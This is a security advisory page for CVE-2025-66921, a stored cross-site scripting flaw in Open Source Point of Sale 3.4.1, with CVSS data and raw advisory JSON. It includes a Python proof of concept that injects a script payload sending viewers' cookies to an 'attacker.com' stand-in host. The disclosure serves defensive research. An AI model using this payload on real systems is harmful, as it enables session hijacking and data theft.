Security Vulnerability Report
CVE-2025-66921 CVSS 7.2 HIGH

Published: 2025-12-17 17:15:51
Last Modified: 2025-12-18 19:52:17

Description

A Cross-site scripting (XSS) vulnerability in Create/Update Item(s) Module in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the "name" parameter.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:opensourcepos:open_source_point_of_sale:3.4.1:*:*:*:*:*:*:* - VULNERABLE
Open Source Point of Sale v3.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-66921 PoC - Stored XSS in Open Source Point of Sale
# Target: Open Source Point of Sale v3.4.1
# Module: Create/Update Item Module
# Parameter: name

TARGET_URL = "http://target.com/opensourcepos"
LOGIN_URL = f"{TARGET_URL}/index.php/login"
ITEM_URL = f"{TARGET_URL}/index.php/items/save"

# Malicious XSS payload
XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'


def exploit():
    """
    Exploit for CVE-2025-66921
    This PoC demonstrates how to inject XSS via the 'name' parameter
    """
    session = requests.Session()

    # Step 1: Login with high privilege account (admin/manager)
    login_data = {
        'username': 'admin',
        'password': 'password'
    }
    session.post(LOGIN_URL, data=login_data)

    # Step 2: Create item with XSS payload in name parameter
    item_data = {
        'name': XSS_PAYLOAD,
        'category_id': '1',
        'cost_price': '10.00',
        'unit_price': '20.00',
        'tax_percent': '0',
        'quantity': '100'
    }
    response = session.post(ITEM_URL, data=item_data)

    if response.status_code == 200:
        print('[+] XSS payload injected successfully!')
        print('[+] Payload will execute when item is viewed by any user')
        return True
    else:
        print('[-] Exploitation failed')
        return False


if __name__ == '__main__':
    exploit()

References

https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66921/readme.md (Exploit, Third Party Advisory)
https://github.com/opensourcepos/opensourcepos (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66921", "sourceIdentifier": "[email protected]", "published": "2025-12-17T17:15:50.827", "lastModified": "2025-12-18T19:52:17.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-site scripting (XSS) vulnerability in Create/Update Item(s) Module in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the \"name\" parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensourcepos:open_source_point_of_sale:3.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "8EC6C4DB-C7B4-46A5-9479-851918C55014"}]}]}], "references": [{"url": "https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66921/readme.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/opensourcepos/opensourcepos", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66921/readme.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}